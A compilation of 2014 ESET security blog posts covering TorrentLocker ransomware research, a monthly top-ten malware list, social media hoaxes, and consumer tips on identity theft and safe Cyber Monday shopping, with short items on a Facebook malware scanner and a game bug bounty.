TorrentLocker: Racketeering ransomware hits Ireland as well

Security experts at ESET have released their latest research into the notorious TorrentLocker malware, which has infected thousands of computer systems around the world, taking data hostage and demanding a ransom be paid to ensure its safe return.

TorrentLocker white paperIn a technical white paper, researcher Marc-Étienne Léveillé describes how the TorrentLocker family of ransomware (which is known as Win32/Filecoder.DI by ESET security products, but which the malware’s creators would apparently rather be known as “Racketeer”) has evolved since its first sighting in February 2014.

As months have passed, TorrentLocker (named because early versions of the malware set a Registry entry which referenced the Bit Torrent application) has become more sophisticated and automated its systems.

For instance, in September Finnish researchers at Nixu Oy detailed a method by which victims of TorrentLocker could recover the contents of their encrypted files, without handing any money over to the criminals behind the attack.

Predictably, once they realised that it was possible to extract the keystream, the authors of TorrentLocker released a new version which changed their encryption methodology, and shut the door on the loophole immediately.

Another example is that at first victims were required to send emails to the criminals behind the malware to make payments and request decryption keys. Today, this has been automated via a user-friendly payment page, explaining how to pay with Bitcoins to receive the decryption software.

TorrentLocker payment page

But although the malware has become more sophisticated, in other ways it appears less professional.

Some of the screens displayed by TorrentLocker refer to “CryptoLocker” instead. Is this a case of laziness on the malware creator’s part, or a deliberate attempt to dupe users into searching for information about an unrelated (albeit just as notorious) piece of ransomware?

Furthermore, the gang behind TorrentLocker does not appear interested in maximising its potential pool of victims by striking at computer users around the globe.

Infected countries

ESET researchers have determined that spam campaigns used to distribute TorrentLocker have only targeted specific countries.

Typically, the malicious emails arrive in the form of a bogus message claiming to relate to an unpaid invoice, the delivery of a package, or a fine for an unpaid speeding ticket.

Malicious webpage, posing as government fine

The following list of countries targeted by the malicious email campaigns is notable for its surprising exceptions (the United States, for instance, is nowhere to be seen):

  • Australia
  • Austria
  • Canada
  • Czech Republic
  • Italy
  • Ireland
  • France
  • Germany
  • Netherlands
  • New Zealand
  • Spain
  • Turkey
  • United Kingdom

What the technical paper makes clear, however, is that the rewards to be made through the TorrentLocker malware are considerable. ESET’s research indicates that even though a mere 1.45% of victims are paying the ransom (570 of 39,670 infected systems) that has still made the criminals between $292,700 and $585,401 in Bitcoins.

And, according to data gathered from TorrentLocker’s C&C (command and control) servers, a jaw-dropping 284,716,813 documents have been encrypted to date.

One has to hope that a fair proportion of the victims have access to a recent, clean backup from which they can restore their precious data.

For much more detailed information about TorrentLocker, be sure to have a look at the technical white paper from ESET.

by Graham Cluley, We Live Security

Monthly Threat Report: November 2014

The Top Ten Threats

1. HTML/Refresh
Previous Ranking: 1
Percentage Detected: 3.13%

HTML/Refresh is a Trojan that redirects the browser to a specific URL location with malicious software. The program code of the malware is usually embedded in HTML pages.

2. Win32/Bundpil
Previous Ranking: 2
Percentage Detected: 2.33%

Win32/Bundpil.A is a worm that spreads via removable media. The worm contains an URL address from which it tries to download several files. The files are then executed and HTTP protocol is used for comunication with the C&C to receive new commands. The worm may delete the following folders:

3. Win32/Adware.MultiPlug
Previous Ranking: 5
Percentage Detected: 1.93%

Win32/Adware.Multiplug is a Possible Unwanted Application that once it’s present into the users system might cause applications to displays advertising popup windows during internet browsing.

4. Win32/TrojanDownloader.Wauchos
Previous Ranking: N/A
Percentage Detected: 1.48%

It is a trojan which tries to download other malware from the Internet. It collects information about the operating system, settings and the computer IP address. Then, attempts to send gathered information to a remote machine. It can download files from a remote computer and/or the Internet, run executable files, create Registry entries and remove itself from the infected computer.

5. Win32/Sality
Previous Ranking: 8
Percentage Detected: 1.41%

Sality is a polymorphic file infector. When executed it starts a service and created/deleted registry keys related to security applications activite in the system and to ensure that the malicious process restarts at each reboot of operating system.
It modifies EXE and SCR files and disables services and processes implemented by and associated with security solutions.

More information relating to a specific signature:

6. LNK/Agent.AK
Previous Ranking: 7
Percentage Detected: 1.35%

LNK/Agent.AK is a link that concatenates commands to execute legitimate code while running the threat code in the background. It is similar in its effect to the older autorun.inf type of threat. This vulnerability became known at the time of discovery of Stuxnet, as it was one of four vulnerabilities that were executed by Stuxnet variants.

7. JS/Kryptik.I
Previous Ranking: 3
Percentage Detected: 1.29%

JS/Kryptik is a generic detection of malicious obfuscated JavaScript code embedded in HTML pages; it usually redirects the browser to a malicious URL or implements a specific exploit.

8. INF/Autorun
Previous Ranking: 10
Percentage Detected: 1.22%

INF/Autorun is a generic detection of versions of the autorun.inf configuration file created by malware. The malicious AUTORUN.INF file contains the path to the malware executable. This file is usually dropped into the root folder of all the available drives in an attempt to autorun a malware executable when the infected drive is mounted. The AUTORUN.INF file(s) may have the System (S) and Hidden (H) attributes present in an attempt to hide the file from Windows Explorer.

9. Win32/Ramnit
Previous Ranking: N/A
Percentage Detected: 1.17%

This is a file infector that executes every time the system starts. It infects .dll (direct link library) and .exe executable files and also searches htm and html files so as to insert malicious instructions into them. It exploits a vulnerability found on the system (CVE-2010-2568) that allows it to execute arbitrary code. It can be controlled remoteley to capture screenshots, send information it has gathered, download files from a remote computer and/or the Internet, and run executable files or shut down/restart the computer.

10. HTML/ScrInject
Previous Ranking: 6
Percentage Detected: 1.08%

Generic detection of HTML web pages containing script obfuscated or iframe tags that that automatically redirect to the malware download.

Trust, Truth and Hoaxes in Social Media

Social networks irritate many of us at least part of the time, but they have their good points. While some networks have a habit of moving the security goalposts from time to time for the benefit of its real customers – i.e. those who are paying for upgrades from the free service, or to take advantage of marketing potential – they offer lots of opportunities for people to connect (or re-connect) with friends or colleagues, share information of local or specialist interest, show off selfies to an audience that won’t usually be too critical of blurriness and trees growing out of heads, and publish flash-heavy over-exposed views of the meal they just demolished. (OK, some types of post are more interesting than others…)

Of course, you need to be aware that you – or at any rate your purchasing habits and, on occasion, other activities and characteristics – are the commodity, not the customer, as we security drones are always anxious to remind you. But you also need to bear in mind that the details of day-to-day human contact can be magnified enormously for an online community, whether it’s an official group you belong to or your own contact list, and there are good and bad aspects to that. It’s certainly gratifying for many people to reach people across the globe with photographs of a new baby, for example, with a single post. On the other hand, if your dress sense is harshly criticized by someone in the same room, it’s possibly less humiliating than being flamed for your grammar or an alleged lack of intelligence in a group with 300,000 members.

If someone shares misinformation with you on the bus or in a bar, it may have relatively little impact on the community at large. But I’ve often described social media as the natural supplement to or even replacement of email as the hoaxer’s weapon of choice, and because the last thing social media are noted for is restricting the flow of information (or misinformation), they could well be described as a weapon of mass deception. It’s not that users are automatically gullible or stupid, though I often see comments on blog articles here that suggest that they are. In fact, we shouldn’t underestimate the potential of a social network as an educational tool.

Premium Rate Semi-Hoax

Every year at around this time, I see warnings like this about a scam intended to trick victims into calling a premium rate number.

“Can you circulate this around especially as Xmas is fast approaching – it has been confirmed by Royal Mail. The Trading Standards Office are making people aware of the following scam:

A card is posted through your door from a company called PDS (Parcel Delivery Service) suggesting that they were unable to deliver a parcel and that you need to contact them on 0906 6611911 (a Premium rate number).

DO NOT call this number, as this is a mail scam originating from Belize. If you call the number and you start to hear a recorded message you will already have been billed £315 for the phone call.

If you do receive a card with these details, then please contact Royal Mail Fraud on 020 7239 6655.”

Snopes cites almost the same message but with a little extra that I can’t resist quoting:

Hi all just received this via a solicitors office so we know it’s genuine. 

(Apologies to any of my lawyer friends who are offended by my finding this amusing. There will now be a short break while I try to remember whether I have any lawyer friends. If not, now might be the time when I need one.)

As Snopes points out, there is (or rather was in 2005) some truth in this, though the £315 phone bill is wildly exaggerated. According to Action Fraud, PhonepayPlus issued the following statement. The PhonepayPlus site shows a link to a statement, but the page it links to seems to have been moved or removed, else I’d have linked it directly. However, it sounds about as I remember it.

  • The chain email refers to a service (operating on 0906 6611911) that was shut down by PhonepayPlus (then ICSTIS) in December 2005.
  • PhonepayPlus subsequently fined the company that was operating the service, Studio Telecom (based in Belize), £10,000.
  • The service is NO LONGER running and has NOT been running since December 2005.
  • You do NOT need to contact PhonepayPlus, or the Royal Mail, about this service as it was stopped almost eight years ago.
  • If you receive a copy of the email warning you about the alleged scam, please do NOT forward it to others. Instead, please forward this statement from PhonepayPlus. 
  • If you receive a delivery card through your letterbox which you do not believe is genuine and which asks you to dial a premium rate number, you can contact PhonepayPlus on 0800 500 212 (Mon-Fri, 8am-6pm) for further guidance.

Shooting the Messenger

Because hoaxes became an obsession of mine long before I joined the security industry – an obsession with fighting them, that is, not creating them – I usually find myself pointing out that stuff like this is a hoax. Despite the fact that I sometimes get bad-tempered responses from people who refuse to believe it. Recently, however, I saw an instance where the message above was posted to a Facebook group and got an immediate response from several people who recognized it as a hoax (long before I got to it). So sometimes the message does get through, and education does work (to an extent).  While hoaxers are helped by the fact that when lots of people spread misinformation, this will be seen as somehow more corroborative than if only isolated instances are seen, it’s clear that people are likelier to believe that a hoax is a hoax if several of their friends say so, rather than one ‘so-called expert.’ (Takes a sardonic bow…)

However, it’s important to note that while this particular scam is no longer current, the principle on which it works is one that could be revived. Certainly there is no shortage of scams mean to trick the unwary into ringing premium rate numbers.

Nevertheless, old favourites do resurface that have little or no basis in fact. Since 2012 this image has regularly recirculated on Facebook.

Your Contract with Facebook

Of course, it isn’t usually conveniently tagged as a hoax: I inserted that text because it’s not unknown for people to look at something like this without reading further, so they may think that it’s genuine. But it certainly isn’t genuine, as you might guess from the number of times it gets reposted. Facebook does have a Statement of Rights and Responsibilities that ‘governs [its] … relationship with users and others who interact with Facebook.’ Snopes points out that one of these provisions is:

You will not post content that: is hate speech, threatening or pornographic; incites violence; or contains nudity or graphic or gratuitous violence.

In fact, there’s a great deal more to that Statement (and there are many good reasons for looking through it, as we’ll see in a minute), but there’s certainly no suggestion there that religious images are forbidden in their own right. It would, presumably, be another matter entirely if they fell into one of the categories of unacceptable content defined in that extract and other parts of the Statement (such as the one that mentions copyright infringement). Hoax-Slayer suggests that the hoax originates with attention-seeking individuals trying to boost their page stats.

Given how many subscribers Facebook actually has, it’s slightly odd that so many of them regard it with such suspicion, yet make such frequent use of it. Certainly, what you post to Facebook (including unequivocal Intellectual Property) is not entirely your own, as that Statement of Rights and Responsibilities makes perfectly clear. As a result many people have posted this disclaimer or a close variant in the belief that it will allow them more control over their content:

I do declare the following: on this day, [Month] [Day], [Year], in response to the new Facebook guidelines and under articles L.111, 112 and 113 of the code of intellectual property, I declare that my rights are attached to all my personal data, drawings, paintings, photos, texts etc… published on my profile. For commercial use of the foregoing my written consent is required at all times.
Those reading this text can copy it and paste it on their Facebook wall. This will allow them to place themselves under the protection of copyright.
By this release, I tell Facebook that it is strictly forbidden to disclose, copy, distribute, broadcast, or to take any other action against me on the basis of this profile and/or its contents. The actions mentioned above apply equally to employees, students, agents and/or other staff under the direction of Facebook.
The contents of my profile include private information. The violation of my privacy is punished by the law (UCC 1 1-308 – 308 1 -103 and the Rome Statute). Facebook is now an open capital entity.
All members are invited to post a notice of this kind, or if you prefer, you can copy and paste this version.
If you have not published this statement at least once, you will tacitly allow the use of elements such as your photos as well as the information contained in your profile update.

However, your agreement with Facebook is a contract, as is the case with other social media providers: you can’t use a unilateral statement like this to opt out of the contract stipulations you agreed with the company when you joined, as long as they’re conditions that Facebook can legally impose (or modify, if it chooses). You can try to negotiate a non-standard contract with a provider, but a service with hundreds of millions of subscribers isn’t likely to consider one-to-one contract variations, especially when it isn’t charging for the service it provides.

Continuing use of the service is conditional upon the user’s terms of service and the data use policy and changes in Facebook’s legal status as an entity don’t in principle affect its rights to use its users’ information and content. Reproducing that disclaimer has no real legal force.

The good news is that those rights aren’t as comprehensive as has been suggested. Facebook put it like this, back in 2012.

Anyone who uses Facebook owns and controls the content and information they post, as stated in our terms. They control how that content and information is shared. That is our policy, and it always has been.

Though that 2012 page seems to have disappeared from the site, an earlier post still survives that expresses Facebook’s difficulty in reconciling conflicting user expectations:

Our philosophy is that people own their information and control who they share it with. When a person shares information on Facebook, they first need to grant Facebook a license to use that information so that we can show it to the other people they’ve asked us to share it with. Without this license, we couldn’t help people share that information.


People want full ownership and control of their information so they can turn off access to it at any time. At the same time, people also want to be able to bring the information others have shared with them—like email addresses, phone numbers, photos and so on—to other services and grant those services access to those people’s information. These two positions are at odds with each other.

More legalistically expressed, in its Statement of Rights and Responsibilities, the company states that:

…subject to your privacy and application settings: you grant us a non-exclusive, transferable, sub-licensable, royalty-free, worldwide licence to use any IP content that you post on or in connection with Facebook (IP Licence). This IP Licence ends when you delete your IP content or your account, unless your content has been shared with others and they have not deleted it.

The essence of the Facebook service is to facilitate on your behalf the sharing of the content you choose to share, subject to the control it allows you over where and to whom it is shared. That licence agreement is what Facebook deems necessary to enable it to provide that service. And it is an agreement: if you’re using the service, you’ve agreed to it, even if you haven’t read it. That’s how contractual obligation works. If your account (or the content) is deleted, the company relinquishes its right to it, though Facebook has stated that when it deletes your account, it doesn’t delete data that have been shared so that they could still be found on someone else’s account or even outside Facebook. Which is pretty much how Internet services work anyway. (For example, once I’ve sent email to you, I can, via my mail provider, delete it from my account but not from yours, let alone from the account of anyone you’ve shared it with.)

Pity the Poor Politician

If people find it hard to be fully sympathetic to social networks, they seem to find it even harder to raise some sympathy for politicians, in general. I have long thought that in a rational world, wanting to be a politician would automatically disqualify an aspiring representative of the people, or at least require comprehensive evaluation of his or her mental health. So I can understand that people are ready – especially in times of economic hardship – to expect the worst from their leaders. It doesn’t help when politicians are most often seen in public milking media opportunities and slagging off the opposition.

In the UK, a common group of memes analysed by The Spectator purports to demonstrate that most Members of Parliament only turn out in force for debates in the House of Commons to discuss their own salaries. But when social networks are used as a forum for political discussion, all is not always what it seems, for several reasons.

  • A snapshot of the chamber at a given moment in the course of a long-running debate may give a seriously misleading impression of how many MPs (and which MPs) participated overall.
  • Parliamentarians do a lot of work (no, honestly!) apart from attending debates: as Isobel Hardman’s article puts it:

When debates go on for several hours, MPs often pop in and out as they have other business going on at the same time. They may be in a select committee, meeting constituents, taking part in a Westminster Hall debate, running an all-party parliamentary group meeting, briefing journalists, plotting a rebellion with colleagues or working in their office.

  • There’s even an argument that how much MPs is paid is important, given the influence they have on the lives of the rest of us. I suppose. Though there are MPs I would actually pay to stay away from Westminster, if I could afford it. (Let’s not talk about expenses fiddling and ex gratia consultancy fees: I’m depressed enough as it is.) And in fact, MPs salaries are apparently now set by an independent body in any case. But that argument isn’t really relevant because…
  • …many of the photographs deployed to support this meme have been totally (and presumably deliberately) misrepresented. For instance, a photo showing a packed chamber (I’m talking about lots of MPs in the same room, not attempts to game the democratic process!) that is claimed to have been taken at a debate on MP’s expenses or pay, actually shows Prime Minister’s Question Time. If you’ve ever seen Prime Minister’s Questions – characteristically a choice mixture of sycophancy, cheap insults across the floor, and general bad behaviour – you may think that’s no better than an expenses debate, but that’s a different discussion.


There’s a very simple moral to this article. Not everything you see on the Internet in general or social media in particular is gospel truth. Sometimes interesting or gratifying or controversial facts, posts and memes are complete fabrications. The fact that tens of thousands of people have ‘Liked’ an article doesn’t prove that it’s true. (Though it doesn’t prove that it isn’t, either.) The fact that one or more of your very intelligent and well-informed friends posted it isn’t conclusive proof that it’s accurate, either. Sometimes, very bright people fall for bogus messages because they want to believe them: for instance, because they fit with their political views, or offer some exciting gift, or refer to some threat that they don’t have the technical knowledge to recognize as improbable. Intelligence and omniscience are not synonyms. Sometimes, people just don’t care: they like the story the message tells too much to check it. A while ago on this blog I said:

E.M. Forster said something like “the confidence trick is the work of man, but the want-of-confidence trick is the work of the devil.” The fact is, though, that a little paranoia can save a lot of heartache, and some very bad men rely on the gullibility of others.

I was talking about education as a countermeasure against social engineering in general, but a little scepticism goes a long way towards countering hoaxes, too. I suspect that the sort of extreme scepticism (or paranoia) that tends to characterize security researchers is something you either have or don’t have, but here are a couple of resources you might find interesting anyway.

  • Truth, Lies and the Internet, a Demos report referenced in the Spectator article, is focused on ‘young people’s digital fluency’, but many of the points made are highly relevant to the community in general.
  • Here’s an article by Maria Popova that summarizes Carl Sagan’s Baloney Detection Kit.

HT to Richi Jennings for drawing my attention to the Spectator article.

by David “Of course, I could be lying about all this” Harley
ESET Senior Research Fellow

Six tips to help prevent identity theft online

Private data such as addresses and other personal details can be just as valuable to cybercriminals intent on identity theft as valid credit card details can be to thieves  – if not more so.

Knowing the name, address history and ID numbers of someone with good credit allows a thief to steal not just once – but many times.

What is shocking is how freely many people hand out data which forms the building blocks of identity theft.

A Microsoft survey of 10,000 consumers in 2014 found that the worldwide annual cost of identity theft and phishing could be as high as $5 billion – and the cost of repairing damage to people’s reputation online could be even higher: up to $6 billion, with the 10,000 consumers polled by Microsoft losing  an average of $632.

The survey found that out of more than 10,000 consumers surveyed, 15% said that they had been a victim of phishing, losing an average of $158, a further 13% said their professional reputation had been compromised, costing on average $535 to repair, and 9% said they had suffered identity theft at an average cost of $218.

Thankfully, there are steps you can take both to check that your data is not already available in ‘the wild’ – but also to lock it down so that cybercriminals will (hopefully) ignore you in favour of easier targets.

1. Identity theft: know the warning signs

Signs that your identity details are being used for fraud include letters from your bank appearing to drop in frequency (identity thieves frequently change your banking address so that letters don’t reach you), and letters from financial institutions you don’t recognise.

Keep track on the dates that you normally receive bills and call your institution if you don’t. And always read anything from financial institutions you DON’T recognise.

It’s very easy to dismiss such letters as junk mail – but if you receive a letter from a loan company or credit card company, it’s worth reading to check that someone is not taking loans in your name.

2. If you are posting sensitive information, post it

mail a letter

If you are applying for a credit card, or sending a tax return, you’re sending enough information for a cybercriminal to make money from identity theft.

Don’t send it via a mailbox where it could be stolen (i.e via an employer’s internal mail system). Go directly to a post office, and put it into the box yourself.

3. Even if you have been banking online for years, change the password

change your password

Your bank and credit card company passwords are among the most important ones you have when it comes to protecting yourself against identity theft – but if you’ve been using the same service for years, it’s easy to keep using the same old, weak password.

Change it. For an ESET guide to making passwords as strong as possible, click here.

If your site forces you to change your password periodically, do so using strong passwords.

Users often respond to such requests by adding the required special characters to the end of passwords, or adding numbers there instead. If your password leaks, this is among the first things a password cracker will try.

ESET Senior Research Fellow David Harley says, “This also applies where the site requires you to change your password periodically but allows you to do so by appending a number. Password cracking 101.”

4. If someone calls you, it’s THEIR job to prove who they are

phone scams

Common identity theft scams often rely on you handing over the information willingly – in response to a call or email from your bank or another institution.

In these situations, remember that banks do not usually operate this way. It’s your right to hang up if you are suspicious that a call is an identity theft scam.

Most importantly of all, it is THEIR job to prove that they are calling from a bank, not your job to prove who you are. Emergency fraud alerts from a bank will not require you to hand over personally identifying informatio – that’s a clear sign that the fraud has yet to happen, and you are facilitating it.

5. Safeguard personal information in your home

safeguard information in your home

Many of us will invite tradesmen and cleaners into our homes without a second thought, and check only for outright thefts of cash or jewellery – despite the fact that personally identifying information can be just as valuable if not more so.

If you invite people you do not know into your home, make sure that documents such as tax returns, credit card details and government identity certificates are kept under lock and key.

If your home has been burgled, be alert for identity theft frauds following steps one and two above.

6. Be wary of Facebook quizzes

Be wary of Facebook quizzes

It pays to be wary of oversharing on social networks generally – but anyone security conscious should also pay attention to the sort of content they click on.

Some people thought that Facebook quizzes might have peaked when Slate made the spoof, ‘What kind of Buzzfeed quiz are you?’ But some of these quizzes are not just boring – they’re risky.

As ESET Senior Research Fellow David Harley notes here, some of these quizzes appear to harvest data which might be extremely useful for criminals – and some quiz companies have previously been caught selling data to advertisers such as drug companies from health-related quizzes.

The same applies double to any raffle, money-off offer or freebie offered through Facebook – if you find yourself handing out the same data you’d enter when applying for a credit card, do not hit Enter.

Leave the page, close your browser, and walk away.

ESET and Facebook offer ‘ESET Online Scanner’ for all Facebook users for free


ESET Online Scanner for Facebook is going live today and will be available for all Facebook users. ESET’s solution will help users scan and identify malware that was posted to their Facebook account after logging onto an infected computer and safely remove it. 

“Our goal is to offer our users the right technology to improve their experience of our services and better protect their devices. ESET Online Scanner for Facebook will significantly decrease the number of malicious links from among the trillions of clicks that take place every day on Facebook,” said Chetan Gowda at Facebook.


ESET Online Scanner for Facebook was designed to detect and clean infected computers of Facebook users. “ESET is pleased to offer its services to Facebook users all over the world. Signature low system footprint and ESET’s top rated detection technology used in ESET Online Scanner guarantee effective and easy detection for free,” said Ignacio Sbampato, Chief Sales and Marketing Officer at ESET.

When a Facebook user logs into their account, Facebook checks for signs of any suspicious behavior – like sending spam messages or infected links to people’s friends. If this kind of activity is detected, Facebook displays a message offering the user a chance to use ESET Online Scanner for Facebook – utilised directly within Facebook without a fee or interruption.


If users download and run the scanner, they can continue to use Facebook and other services on their device without any loss of performance. When the scan is complete, they will receive a notification through Facebook and also be able to review the results of the scan. Cleanup begins after the scan is complete if any malware is discovered.

This service for Facebook is based on the free product ESET Online Scanner, which protects millions of users online.

Play League of Legends? Wanna earn money?


Riot Games has paid out over $100,000 to security researchers poring over the game looking for exploits, hacks and bugs, in its League of Legends bug bounty scheme, Security Week reports.

The HackOne platform, on which the League of Legends bug bounty program is based on has been open since April 2013, but only to a handful of security researchers. Despite this, since then they have found a total of 75 exploits which Riot Games has duly patched up.

Bugs squashed have included client crash exploits, vision related flaws and exploits where players could potentially be impersonated on official forums.

The latter of these was how Riot Games came to set up the bug hunting program in the first place. An Australian researcher found a vulnerability that would have allowed him to steal the identity of players to impersonate on the forums – there was no hijacking involved, but it could have been used for phishing. Because at the time the company had no official security channels in place, the note was posted via the general enquiries email account, which meant it took around a week to reach the people who needed to fix it.

The official Riot Blog post on its League of Legends bug bounty describes this point as “admitting we had a problem.”

“If we’re not listening, it can frustrate researchers with good intentions and lead them to post their exploits online in order to get our attention. That’s not great for the researcher and could cause confusion and pain for players,” the company explained.

Now, the company intends to open the program to “all security researchers and enthusiasts” though they’re not quite ready yet. “Before we can expand the program, we need to get aligned on a foundational workflow that allows our security team to efficiently handle every report from the field and turn them into bugs that development teams will own,” the company explained. In the meantime, anyone with an exploit to report can contact the security team directly via email.

Bug Bounty schemes are proving increasingly popular, with the likes of Pinterest, Twitter, Blackphone, Microsoft and Google offering incentives for exploits researchers find in their travels.

by Alan Martin, ESET

Cyber Monday – 12 tips to help you shop safely online

‘Cyber Monday’ is rapidly becoming a boom industry for cybercriminals, with reports of frauds having leapt 31% in 2013, according to police statistics quoted by The Guardian.

With social media helping to whip up the frenzy in the days of the Black Friday and Cyber Monday sales – and retailers hyping bargains via Facebook, Twitter and email, it’s all too easy to click on the wrong link.

Tech Week predicts that Cyber Monday sales via social media will increase 21% over last year.

Technology might evolve, but cyber gangs rely on tried-and-tested tactics. With a bit of care and attention, it’s easy to sort the genuine bargains from the too-good-to-be-true fakes.

It’s also easy to put a few precautions in place – so that if you ARE caught out, you won’t lose out in the long run.

The best advice of all, though, is simply to stay alert – watch your bank statements, from now right until the end of January, and if you see anything odd, call your bank immediately.

Cyber Monday: How to shop safely

  • Make sure your bank has an up-to-date telephone number for you: this will allow them to get in touch rapidly if they notice suspicious transactions. This can help both to speed through genuine transactions – and to stop criminals in their tracks if your card number is being misused.
  • Be ultra-wary of ‘bargains’ and social-media offers around iPhones, Samsung phones, games consoles and iPads on Cyber Monday. The UK organisation Get Safe Online says that these are the items most commonly involved in fraudulent sales or auctions, along with fashion items such as Ugg boots.
  • Buy items using credit cards, not debit cards –  credit cards usually offer protection against fraud, whereas many debit cards do not.
  • Where possible, ensure that your cards are enrolled in schemes such as Verified by Visa or Mastercard SecureCode, which offer an additional layer of protection when buying online.
  • Check delivery and returns policies where you can – one of the most common frauds during the holiday season is to deliver fake or faulty goods, and then refuse to refund the money.
  • Shop on PC with anti-malware protection if you can – but if you are using mobile, use security software. Last year saw mobile sales leap to around 20% of holiday-season shopping, according to a We Live Security report – and rise 187% year-on-year according to GigaOM. Good Mobile AV software will alert you if you’re being directed to a bogus site.
  • If you are using a PC to buy, spring clean before you shop – update your browser, plug-ins, OS, and flush with good AV software.
  • The browser bar is your friend: check the spelling of any site you’re shopping from, and check to see that there’s a ‘lock’ symbol and HTTPS to show you’re secure when you’re about to buy. If it’s not there, leave.
  • Auction sites are rife with fraud on Cyber Monday- and be extra wary around expensive items. Always choose a payment method approved by the site and covered by their insurance – and never pay direct to the seller.
  • Don’t click on a link your friend sends you, or you see shared on Facebook – no matter how good the bargain is. That’s just asking to be sent to a fake site. Instead, go in via the front page, and find the item from there – if it is a sale item the retailer is pushing, it will be easy to find anyway.
  • Don’t overshare. Many frauds rely on you handing over information, thinking you’re making a purchase – then the fraudster uses your information to drain funds from your account. If you’re asked for ‘extra’ info, such ID or phone number, be wary.
  • If a bargain appears on a store you’ve never heard of, step back and use a search engine to find reviews of the store, and see how long it’s been around for. If information seems to be lacking, don’t buy.

Follow these tips, and you can be sure that you’ll be bringing home bargains this holiday season – rather than handing out valuable information (or money) to cybercriminals.

Author Rob Waugh, ESET


Get every new post delivered to your Inbox.

Join 78 other followers